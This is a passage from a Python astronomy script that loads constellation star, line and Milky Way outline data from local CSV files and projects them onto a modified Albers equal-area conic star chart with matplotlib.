ts.utc(ts.now().utc_datetime().replace(second=0,microsecond=0))\r\n##date_local = date_UTC.astimezone(tz)\r\n#####################################\r\n\r\nfig, ax0 = plt.subplots(figsize=(7.2*3,4.8*3), facecolor='black')\r\nfig.subplots_adjust(0,0,1,1)\r\nax0.set_facecolor('black')\r\nax0.set_aspect('equal')\r\nax0.set_xlim((-3,3))\r\nax0.set_ylim((-1,3))\r\n\r\nzenith_shift_ra = 0\r\nzenith_shift_dec = 0\r\nrotate_angle = 0\r\naspect_ratio = 1 #y/x\r\nplot_scale = 180/math.pi\r\nx_shift = 0\r\ny_shift = 0\r\n\r\nannotation_on = 1\r\n\r\nplot_alpha = 0.5\r\n\r\nhorizon_conic = [0] * 361\r\nhorizon_conic = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\nequator_conic = [0] * 361\r\nequator_conic = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\necliptic_conic = [0] * 361\r\necliptic_conic = 
pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\ngrid_dec = [0] * 361\r\ngrid_dec = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\ngrid_ra = [0] * 361\r\ngrid_ra = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\ncircumpolar = [0] * 361\r\ncircumpolar = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\n\r\nAnd = numpy.zeros(shape=(178,5))\r\nAnd = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','And.csv'))\r\nAnt = numpy.zeros(shape=(48,5))\r\nAnt = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ant.csv'))\r\nAps = numpy.zeros(shape=(36,5))\r\nAps = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Aps.csv'))\r\nAqr = numpy.zeros(shape=(171,5))\r\nAqr = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Aqr.csv'))\r\nAql = numpy.zeros(shape=(131,5))\r\nAql = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Aql.csv'))\r\nAra = numpy.zeros(shape=(64,5))\r\nAra = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ara.csv'))\r\nAri = numpy.zeros(shape=(86,5))\r\nAri = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ari.csv'))\r\nAur = numpy.zeros(shape=(161,5))\r\nAur = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Aur.csv'))\r\nBoo = numpy.zeros(shape=(154,5))\r\nBoo = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Boo.csv'))\r\nCae = numpy.zeros(shape=(21,5))\r\nCae = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cae.csv'))\r\nCam = numpy.zeros(shape=(158,5))\r\nCam = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cam.csv'))\r\nCnc = numpy.zeros(shape=(112,5))\r\nCnc = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cnc.csv'))\r\nCVn = numpy.zeros(shape=(61,5))\r\nCVn = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CVn.csv'))\r\nCMa = numpy.zeros(shape=(155,5))\r\nCMa = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CMa.csv'))\r\nCMi = numpy.zeros(shape=(44,5))\r\nCMi = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CMi.csv'))\r\nCap = numpy.zeros(shape=(87,5))\r\nCap = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cap.csv'))\r\nCar = numpy.zeros(shape=(210,5))\r\nCar = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Car.csv'))\r\nCas = numpy.zeros(shape=(164,5))\r\nCas = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cas.csv'))\r\nCen = numpy.zeros(shape=(281,5))\r\nCen = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cen.csv'))\r\nCep = numpy.zeros(shape=(157,5))\r\nCep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cep.csv'))\r\nCet = numpy.zeros(shape=(177,5))\r\nCet = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cet.csv'))\r\nCha = numpy.zeros(shape=(34,5))\r\nCha = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cha.csv'))\r\nCir = numpy.zeros(shape=(34,5))\r\nCir = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cir.csv'))\r\nCol = numpy.zeros(shape=(78,5))\r\nCol = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Col.csv'))\r\nCom = numpy.zeros(shape=(71,5))\r\nCom = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Com.csv'))\r\nCrA = numpy.zeros(shape=(46,5))\r\nCrA = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CrA.csv'))\r\nCrB = numpy.zeros(shape=(40,5))\r\nCrB = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CrB.csv'))\r\nCrv = numpy.zeros(shape=(28,5))\r\nCrv = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Crv.csv'))\r\nCrt = numpy.zeros(shape=(33,5))\r\nCrt = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Crt.csv'))\r\nCru = numpy.zeros(shape=(48,5))\r\nCru = 
pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cru.csv'))\r\nCyg = numpy.zeros(shape=(291,5))\r\nCyg = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cyg.csv'))\r\nDel = numpy.zeros(shape=(47,5))\r\nDel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Del.csv'))\r\nDor = numpy.zeros(shape=(34,5))\r\nDor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Dor.csv'))\r\nDra = numpy.zeros(shape=(226,5))\r\nDra = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Dra.csv'))\r\nEqu = numpy.zeros(shape=(15,5))\r\nEqu = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Equ.csv'))\r\nEri = numpy.zeros(shape=(197,5))\r\nEri = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Eri.csv'))\r\nFor = numpy.zeros(shape=(64,5))\r\nFor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','For.csv'))\r\nGem = numpy.zeros(shape=(123,5))\r\nGem = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Gem.csv'))\r\nGru = numpy.zeros(shape=(62,5))\r\nGru = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Gru.csv'))\r\nHer = numpy.zeros(shape=(263,5))\r\nHer = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Her.csv'))\r\nHor = numpy.zeros(shape=(36,5))\r\nHor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Hor.csv'))\r\nHya = numpy.zeros(shape=(246,5))\r\nHya = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Hya.csv'))\r\nHyi = numpy.zeros(shape=(33,5))\r\nHyi = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Hyi.csv'))\r\nInd = numpy.zeros(shape=(39,5))\r\nInd = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ind.csv'))\r\nLac = numpy.zeros(shape=(67,5))\r\nLac = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lac.csv'))\r\nLeo = numpy.zeros(shape=(130,5))\r\nLeo = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Leo.csv'))\r\nLMi = numpy.zeros(shape=(36,5))\r\nLMi = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','LMi.csv'))\r\nLep = numpy.zeros(shape=(76,5))\r\nLep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lep.csv'))\r\nLib = numpy.zeros(shape=(86,5))\r\nLib = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lib.csv'))\r\nLup = numpy.zeros(shape=(117,5))\r\nLup = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lup.csv'))\r\nLyn = numpy.zeros(shape=(100,5))\r\nLyn = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lyn.csv'))\r\nLyr = numpy.zeros(shape=(83,5))\r\nLyr = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lyr.csv'))\r\nMen = numpy.zeros(shape=(26,5))\r\nMen = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Men.csv'))\r\nMic = numpy.zeros(shape=(39,5))\r\nMic = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Mic.csv'))\r\nMon = numpy.zeros(shape=(153,5))\r\nMon = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Mon.csv'))\r\nMus = numpy.zeros(shape=(59,5))\r\nMus = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Mus.csv'))\r\nNor = numpy.zeros(shape=(41,5))\r\nNor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Nor.csv'))\r\nOct = numpy.zeros(shape=(67,5))\r\nOct = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Oct.csv'))\r\nOph = numpy.zeros(shape=(179,5))\r\nOph = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Oph.csv'))\r\nOri = numpy.zeros(shape=(225,5))\r\nOri = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ori.csv'))\r\nPav = numpy.zeros(shape=(82,5))\r\nPav = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Pav.csv'))\r\nPeg = numpy.zeros(shape=(176,5))\r\nPeg = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Peg.csv'))\r\nPer = numpy.zeros(shape=(160,5))\r\nPer = 
pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Per.csv'))\r\nPhe = numpy.zeros(shape=(70,5))\r\nPhe = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Phe.csv'))\r\nPic = numpy.zeros(shape=(50,5))\r\nPic = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Pic.csv'))\r\nPsc = numpy.zeros(shape=(141,5))\r\nPsc = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Psc.csv'))\r\nPsA = numpy.zeros(shape=(49,5))\r\nPsA = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','PsA.csv'))\r\nPup = numpy.zeros(shape=(275,5))\r\nPup = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Pup.csv'))\r\nPyx = numpy.zeros(shape=(48,5))\r\nPyx = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Pyx.csv'))\r\nRet = numpy.zeros(shape=(24,5))\r\nRet = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ret.csv'))\r\nSge = numpy.zeros(shape=(31,5))\r\nSge = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sge.csv'))\r\nSgr = numpy.zeros(shape=(219,5))\r\nSgr = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sgr.csv'))\r\nSco = numpy.zeros(shape=(174,5))\r\nSco = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sco.csv'))\r\nScl = numpy.zeros(shape=(59,5))\r\nScl = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Scl.csv'))\r\nSct = numpy.zeros(shape=(30,5))\r\nSct = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sct.csv'))\r\nSer = numpy.zeros(shape=(112,5))\r\nSer = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ser.csv'))\r\nSex = numpy.zeros(shape=(40,5))\r\nSex = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sex.csv'))\r\nTau = numpy.zeros(shape=(223,5))\r\nTau = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Tau.csv'))\r\nTel = numpy.zeros(shape=(51,5))\r\nTel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Tel.csv'))\r\nTri = numpy.zeros(shape=(26,5))\r\nTri = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Tri.csv'))\r\nTrA = numpy.zeros(shape=(35,5))\r\nTrA = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','TrA.csv'))\r\nTuc = numpy.zeros(shape=(50,5))\r\nTuc = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Tuc.csv'))\r\nUMa = numpy.zeros(shape=(224,5))\r\nUMa = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','UMa.csv'))\r\nUMi = numpy.zeros(shape=(42,5))\r\nUMi = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','UMi.csv'))\r\nVel = numpy.zeros(shape=(193,5))\r\nVel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Vel.csv'))\r\nVir = numpy.zeros(shape=(174,5))\r\nVir = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Vir.csv'))\r\nVol = numpy.zeros(shape=(33,5))\r\nVol = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Vol.csv'))\r\nVul = numpy.zeros(shape=(77,5))\r\nVul = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Vul.csv'))\r\n\r\nconstellation_list = [And,Ant,Aps,Aqr,Aql,Ara,Ari,Aur,Boo,Cae,Cam,Cnc,CVn,CMa,CMi,Cap,Car,Cas,Cen,Cep,\\\r\n Cet,Cha,Cir,Col,Com,CrA,CrB,Crv,Crt,Cru,Cyg,Del,Dor,Dra,Equ,Eri,For,Gem,Gru,Her,\\\r\n Hor,Hya,Hyi,Ind,Lac,Leo,LMi,Lep,Lib,Lup,Lyn,Lyr,Men,Mic,Mon,Mus,Nor,Oct,Oph,Ori,\\\r\n Pav,Peg,Per,Phe,Pic,Psc,PsA,Pup,Pyx,Ret,Sge,Sgr,Sco,Scl,Sct,Ser,Sex,Tau,Tel,Tri,\\\r\n TrA,Tuc,UMa,UMi,Vel,Vir,Vol,Vul]\r\n\r\nlabelxy = 0\r\n\r\nmag_lim = 8\r\n\r\nAnd_line = [[0,3],[1,3],[1,7],[1,9],[2,9],[3,13],[3,14],[5,10],[7,18],[8,14],[10,19],[11,18],[16,19],[13,16]]\r\nAnt_line = [[0,2],[0,3],[1,3]] \r\nAps_line = [[0,3],[1,2],[1,3]]\r\nAqr_line = [[0,1],[0,5],[1,6],[1,10],[2,8],[3,7],[3,18],[4,8],[4,9],[4,12],[6,17],[7,30],[9,17],[10,13],[11,12],\\\r\n [11,14],[14,31],[19,30],[19,31],[21,22]]\r\nAql_line = 
[[0,1],[0,4],[0,6],[2,4],[3,7],[4,5],[4,7]]\r\nAra_line = [[0,1],[0,2],[0,3],[2,6],[3,4]]\r\nAri_line = [[0,1],[0,2]]\r\nAur_line = [[0,1],[0,3],[0,4],[1,2],[4,5],[4,7]]\r\nBoo_line = [[0,1],[0,2],[0,6],[0,11],[2,4],[3,5],[3,6],[4,5]]\r\nCae_line = [[0,2]]\r\nCam_line = [[0,2],[0,4],[1,7],[2,7]]\r\nCnc_line = [[0,1],[1,2],[1,3]]\r\nCVn_line = [[0,1]]\r\nCMa_line = [[0,3],[0,6],[0,12],[0,13],[1,7],[2,6],[2,7],[2,8],[4,8],[12,13]]\r\nCMi_line = [[0,1]]\r\nCap_line = [[0,3],[0,4],[1,2],[1,7],[2,5],[3,9],[4,10],[5,9],[6,7],[6,10]]\r\nCar_line = [[0,10],[2,10],[2,14],[3,11],[3,14],[4,6],[4,15],[8,11],[8,13],[12,13],[12,15]]\r\nCas_line = [[0,1],[0,2],[2,3],[3,4]]\r\nCen_line = [[0,5],[1,5],[3,6],[3,7],[4,5],[4,8],[5,7],[6,12],[8,18],[11,18]]\r\nCep_line = [[0,2],[0,3],[0,4],[1,2],[1,5],[3,5],[3,6]]\r\nCet_line = [[0,3],[0,5],[0,6],[1,4],[1,18],[2,4],[2,8],[3,7],[4,25],[5,8],[7,8],[12,13],[12,18],[13,25]]\r\nCha_line = [[0,1]]\r\nCir_line = [[0,1],[0,2]]\r\nCol_line = [[0,1],[0,3],[1,4],[1,2]]\r\nCom_line = [[0,1],[0,19]]\r\nCrA_line = [[0,1],[0,6],[1,2],[2,4],[3,4],[5,6]]\r\nCrB_line = [[1,2],[1,3],[2,4],[3,6],[5,6],[5,10]]\r\nCrv_line = [[0,2],[0,3],[1,2],[1,3],[3,4]]\r\nCrt_line = [[0,1],[0,2],[0,6],[1,3],[2,3],[2,5],[4,6]]\r\nCru_line = [[0,4],[1,2]]\r\nCyg_line = [[0,1],[1,2],[1,3],[1,11],[2,5],[3,9],[4,11],[8,9]]\r\nDel_line = [[0,1],[0,2],[0,4],[1,3],[3,4]]\r\nDor_line = [[0,1],[0,2],[1,3]]\r\nDra_line = [[0,2],[0,8],[1,4],[1,5],[2,29],[3,8],[3,9],[4,6],[5,7],[6,9],[7,11],[8,29],[10,11]]\r\nEqu_line = [[0,2],[0,3],[1,2],[1,3]]\r\nEri_line = [[0,8],[1,24],[1,27],[2,4],[2,16],[3,18],[3,22],[4,9],[5,8],[5,21],[6,14],[6,19],[7,17],[7,23],[9,12],\\\r\n [10,14],[10,20],[12,30],[13,15],[13,16],[15,27],[17,30],[18,21],[19,22],[20,23]]\r\nFor_line = [[0,1],[1,7]]\r\nGem_line = [[0,8],[1,12],[3,5],[3,6],[4,5],[7,10],[8,10],[8,12],[9,13],[11,13]]\r\nGru_line = [[0,1],[0,2],[0,5],[1,3],[1,4],[4,5]]\r\nHer_line = [[0,1],[0,5],[0,8],[1,6],[1,14],[2,4],[2,14],[3,6],[3,12],[3,14],[4,7],[6,13],[7,10],[9,12],[10,11]]\r\nHor_line = [[0,3],[0,6],[0,9]]\r\nHya_line = [[0,11],[0,12],[1,4],[1,14],[2,5],[2,9],[3,6],[3,8],[4,18],[5,13],[5,17],[6,14],[7,8],[7,12],[9,11],\\\r\n [13,19],[15,17],[15,19]]\r\nHyi_line = [[0,2],[0,4],[1,5],[3,4],[3,5]]\r\nInd_line = [[0,2],[1,2]]\r\nLac_line = [[0,2],[0,3],[1,5],[2,4],[4,5]]\r\nLeo_line = [[0,5],[0,7],[0,8],[0,10],[1,2],[1,5],[2,17],[3,6],[3,8],[3,17],[4,11],[5,12],[6,11]]\r\nLMi_line = [[0,1],[1,2]]\r\nLep_line = [[0,1],[0,3],[0,4],[1,5],[1,12],[2,12],[3,8],[3,9],[4,6],[5,7],[9,10]]\r\nLib_line = [[0,1],[0,2],[0,5],[1,2],[2,3],[3,4],[5,6]]\r\nLup_line = [[0,1],[0,5],[0,7],[1,3],[2,3],[2,4],[2,6],[3,8],[4,5],[6,10]]\r\nLyn_line = [[0,1],[1,2],[2,3],[3,7],[4,5],[4,7]]\r\nLyr_line = [[0,6],[0,12],[1,2],[1,4],[2,6],[4,6],[6,12]]\r\nMen_line = [[0,1],[0,2],[1,4]]\r\nMic_line = [[0,1],[0,3],[1,2],[3,5]]\r\nMon_line = [[0,2],[1,5],[2,3],[2,5],[4,6],[5,6],[5,7]]\r\nMus_line = [[0,1],[0,2],[0,4],[0,5],[3,5]]\r\nNor_line = [[0,1],[0,7],[3,7]]\r\nOct_line = [[0,2],[1,2]]\r\nOph_line = [[0,5],[0,9],[1,2],[1,7],[1,12],[2,6],[3,6],[3,11],[5,11],[9,12]]\r\nOri_line = [[0,5],[0,6],[1,4],[1,10],[1,17],[2,6],[2,10],[2,34],[3,4],[3,6],[4,5],[8,12],[8,21],[12,13],[13,26],\\\r\n [17,27],[21,34],[23,24],[23,33],[24,27],[27,33]]\r\nPav_line = [[0,1],[1,2],[2,3],[3,4]]\r\nPeg_line = [[0,7],[1,2],[1,4],[1,6],[2,3],[2,5],[5,7],[6,9],[8,9]]\r\nPer_line = [[0,4],[0,5],[0,9],[1,6],[1,9],[2,10],[2,12],[3,5],[3,12],[4,7],[5,13],[6,18],[13,17],[17,21]]\r\nPhe_line = 
[[0,1],[0,3],[1,2],[1,4],[2,6],[2,8],[3,7],[3,10],[4,7],[10,11],[11,16]]\r\nPic_line = [[0,2],[1,2]]\r\nPsc_line = [[0,4],[0,34],[1,6],[1,21],[2,3],[2,9],[3,6],[3,11],[4,7],[5,9],[5,19],[7,10],[10,19],[11,21],[18,12],\\\r\n [18,34]]\r\nPsA_line = [[0,1],[0,2],[1,13],[2,5],[3,5],[3,7],[4,7],[4,13]]\r\nPup_line = [[0,2],[0,10],[1,4],[1,29],[2,11],[2,13],[3,4],[5,10],[6,11],[6,21],[10,14],[13,33],[21,28],[28,29]]\r\nPyx_line = [[0,1],[0,2]]\r\nRet_line = [[0,1],[0,2],[1,4],[2,6],[4,6]]\r\nSge_line = [[0,1],[1,2],[1,3]]\r\nSgr_line = [[0,2],[0,3],[0,6],[0,7],[1,8],[1,9],[1,11],[2,8],[2,9],[3,4],[3,6],[3,8],[4,8],[4,12],[5,11],\\\r\n [5,36],[6,20],[9,23],[10,11],[13,24],[13,36],[14,16],[16,17],[16,18],[18,22],[22,27],[23,27]]\r\nSco_line = [[0,8],[0,10],[1,5],[2,11],[2,14],[3,8],[3,12],[4,6],[4,9],[4,10],[14,16],[5,7],[5,11],[9,17],[12,16]]\r\nScl_line = [[0,3],[1,2],[2,3]]\r\nSct_line = [[0,1],[0,2],[0,3],[1,6],[3,4],[4,6]]\r\nSer_line = [[0,5],[0,7],[1,10],[2,5],[3,10],[4,7],[4,8],[4,9],[8,9]]\r\nSex_line = [[0,1],[0,2]]\r\nTau_line = [[0,3],[0,4],[1,6],[4,9],[5,9],[5,11],[6,12],[7,11],[9,12]]\r\nTel_line = [[0,1],[0,2]]\r\nTri_line = [[0,1],[0,2],[1,2]]\r\nTrA_line = [[0,1],[0,2],[1,4],[2,4]]\r\nTuc_line = [[0,1],[0,4],[1,3],[1,9],[2,3],[2,9]]\r\nUMa_line = [[0,3],[0,10],[1,4],[1,10],[1,15],[2,3],[4,5],[4,17],[5,10],[5,16],[6,7],[6,12],[6,16],[8,9],[9,14],\\\r\n [9,17],[11,15],[11,17]]\r\nUMi_line = [[0,6],[1,2],[1,5],[2,9],[3,5],[3,6],[5,9]]\r\nVel_line = [[0,8],[0,15],[1,3],[1,8],[2,7],[2,14],[3,6],[4,6],[4,11],[7,12],[11,12],[14,15]]\r\nVir_line = [[0,2],[0,13],[0,15],[1,3],[2,3],[2,14],[3,5],[4,9],[4,10],[5,9],[5,15],[7,14],[8,11],[10,18],[11,13],\\\r\n [12,18]]\r\nVol_line = [[0,4],[0,5],[1,2],[1,3],[2,5],[3,5]]\r\nVul_line = [[0,2],[0,5]]\r\n\r\n# milkyway\r\nMW_southernedge = numpy.zeros(shape=(263,4))\r\nMW_southernedge = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_southernedge.csv'))\r\nMW_MonPer = numpy.zeros(shape=(71,4))\r\nMW_MonPer = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_MonPer.csv'))\r\nMW_CamCas = numpy.zeros(shape=(13,4))\r\nMW_CamCas = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_CamCas.csv'))\r\nMW_Cep = numpy.zeros(shape=(13,4))\r\nMW_Cep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_Cep.csv'))\r\nMW_CygOph = numpy.zeros(shape=(40,4))\r\nMW_CygOph = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_CygOph.csv'))\r\nMW_OphSco = numpy.zeros(shape=(17,4))\r\nMW_OphSco = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_OphSco.csv'))\r\nMW_LupVel = numpy.zeros(shape=(78,4))\r\nMW_LupVel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_LupVel.csv'))\r\nMW_VelMon = numpy.zeros(shape=(34,4))\r\nMW_VelMon = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_VelMon.csv'))\r\ndark_PerCas = numpy.zeros(shape=(35,4))\r\ndark_PerCas = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_PerCas.csv'))\r\ndark_CasCep = numpy.zeros(shape=(28,4))\r\ndark_CasCep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_CasCep.csv'))\r\ndark_betaCas = numpy.zeros(shape=(20,4))\r\ndark_betaCas = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_betaCas.csv'))\r\ndark_CygCep = numpy.zeros(shape=(22,4))\r\ndark_CygCep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_CygCep.csv'))\r\ndark_CygOph = numpy.zeros(shape=(197,4))\r\ndark_CygOph = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_CygOph.csv'))\r\ndark_thetaOph = numpy.zeros(shape=(28,4))\r\ndark_thetaOph = 
pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_thetaOph.csv'))\r\ndark_lambdaSco = numpy.zeros(shape=(17,4))\r\ndark_lambdaSco = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_lambdaSco.csv'))\r\ndark_ScoNor = numpy.zeros(shape=(31,4))\r\ndark_ScoNor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_ScoNor.csv'))\r\ndark_Coalsack = numpy.zeros(shape=(32,4))\r\ndark_Coalsack = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_Coalsack.csv'))\r\ndark_Vel = numpy.zeros(shape=(22,4))\r\ndark_Vel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_Vel.csv'))\r\nMW_LMC1 = numpy.zeros(shape=(34,4))\r\nMW_LMC1 = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_LMC1.csv'))\r\nMW_LMC2 = numpy.zeros(shape=(12,4))\r\nMW_LMC2 = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_LMC2.csv'))\r\nMW_SMC = numpy.zeros(shape=(14,4))\r\nMW_SMC = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_SMC.csv'))\r\n\r\nMW_list = [MW_southernedge,MW_MonPer,MW_CamCas,MW_Cep,MW_CygOph,MW_OphSco,MW_LupVel,MW_VelMon,\\\r\n dark_PerCas,dark_CasCep,dark_betaCas,dark_CygCep,dark_CygOph,dark_thetaOph,dark_lambdaSco,dark_ScoNor,dark_Coalsack,dark_Vel,\\\r\n MW_LMC1,MW_LMC2,MW_SMC]\r\n\r\n# constellation boundaries\r\nboundary = numpy.zeros(shape=(13238,5))\r\nboundary = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','boundary.csv'))\r\n\r\n############################################################## conic ##############################################################\r\n# observatory\r\n##ra0 = math.degrees(Obs.sidereal_time()) + zenith_shift_ra\r\nra0 = 0 # arbitrary\r\ndec0 = math.degrees(Obs[1]) + zenith_shift_dec\r\n\r\n# projection formula (modified Albers Equal-Area Conic)\r\n\r\nstand_para = (-60,0)\r\norigin = (180+18,6) #mars center at roughly(18,6)\r\n\r\nconic_A = 32\r\nconic_B = (conic_A+90)/90\r\n\r\nconic_n = 0.5*(math.sin(math.radians(stand_para[0]))+math.sin(math.radians(stand_para[1])))\r\nconic_C = math.cos(math.radians(stand_para[0]))*math.cos(math.radians(stand_para[0]))+2*conic_n*math.sin(math.radians(stand_para[0]))\r\nconic_rho0 = math.sqrt(conic_C-2*conic_n*math.sin(math.radians(origin[1])))/conic_n\r\n\r\ntransform_x_conic = lambda x,y: -math.sqrt(conic_C-2*conic_n*math.sin(math.radians((-y-conic_A)/conic_B)))/conic_n*math.sin(conic_n*math.radians(((x-origin[0]) % 360)-180)) \r\n\r\ntransform_y_conic = lambda x,y: math.sqrt(conic_C-2*conic_n*math.sin(math.radians((-y-conic_A)/conic_B)))/conic_n*math.cos(conic_n*math.radians(((x-origin[0]) % 360)-180))-conic_rho0\r\n\r\n#<--use (x-origin[0]) % 360 to shift projection center, then -180 to keep values [-180,180]\r\n\r\n# horizon\r\nfor i in range(360):\r\n horizon_conic.loc[i] = [i,math.degrees(math.atan(-math.cos(math.radians(ra0-i))/math.tan(math.radians(dec0)))),0,0]\r\n\r\nhorizon_conic.x = list(map(transform_x_conic, horizon_conic.RA, horizon_conic.Dec))\r\nhorizon_conic.y = list(map(transform_y_conic, horizon_conic.RA, horizon_conic.Dec))\r\n\r\n#plt.plot(horizon_conic_x,horizon_conic_y,'g-',zorder=1)\r\n\r\n# horizon size\r\nhori_border_conic = max(horizon_conic.x)-min(horizon_conic.x)\r\n\r\n#grid\r\n\r\nfor j in range(13):\r\n\r\n for i in range(360):\r\n\r\n grid_dec.loc[i] = [i,90-15*j,0,0] \r\n\r\n\r\n\r\n grid_dec.x = list(map(transform_x_conic, grid_dec.RA, grid_dec.Dec))\r\n\r\n grid_dec.y = list(map(transform_y_conic, grid_dec.RA, grid_dec.Dec))\r\n\r\n for k in range(len(grid_dec)-1):\r\n if -1 < grid_dec.x[k]-grid_dec.x[k+1] < 1: #roughly shorter than diameter of inner circle\r\n 
